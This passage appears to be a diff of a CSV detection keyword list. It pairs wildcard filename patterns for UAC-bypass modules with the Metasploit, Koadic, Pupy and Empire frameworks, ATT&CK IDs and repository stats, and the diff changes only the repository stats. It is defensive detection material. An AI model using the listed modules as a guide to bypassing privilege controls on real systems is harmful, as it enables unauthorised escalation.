security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*bypassuac_compdefaults*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*bypassuac_compmgmtlauncher*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*bypassuac_eventvwr*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*bypassuac_fodhelper*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" -"*bypassuac_injection*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*bypassuac_injection.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. 
and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*bypassuac_injection.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*bypassuac_injection_winsxs.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. 
exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*bypassuac_registry.*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*bypassuac_injection*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. 
and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*bypassuac_injection.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*bypassuac_injection.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. 
and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*bypassuac_injection_winsxs.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*bypassuac_registry.*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" "*bypassuac_sdclt*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" -"*bypassuac_silentcleanup.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. 
and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*bypassuac_silentcleanup.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*bypassuac_slui*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" -"*bypassuac_sluihijack.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*bypassuac_sluihijack.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. 
and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*bypassuac_systempropertiesadvanced*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" -"*bypassuac_token_imp.*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" -"*bypassuac_vbs.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*bypassuac_windows_store_reg.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. 
and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*bypassuac_token_imp.*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*bypassuac_vbs.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. 
and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*bypassuac_windows_store_reg.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*bypassuac_wsreset*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. 
The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" -"*BypassUACTokenManipulation*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1122","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - 
WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*bypassuac-x64.dll*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*bypassuac-x64.exe*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*bypassuac-x86.dll*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*bypassuac-x86.exe*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. 
and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*BypassUACTokenManipulation*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1122","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - 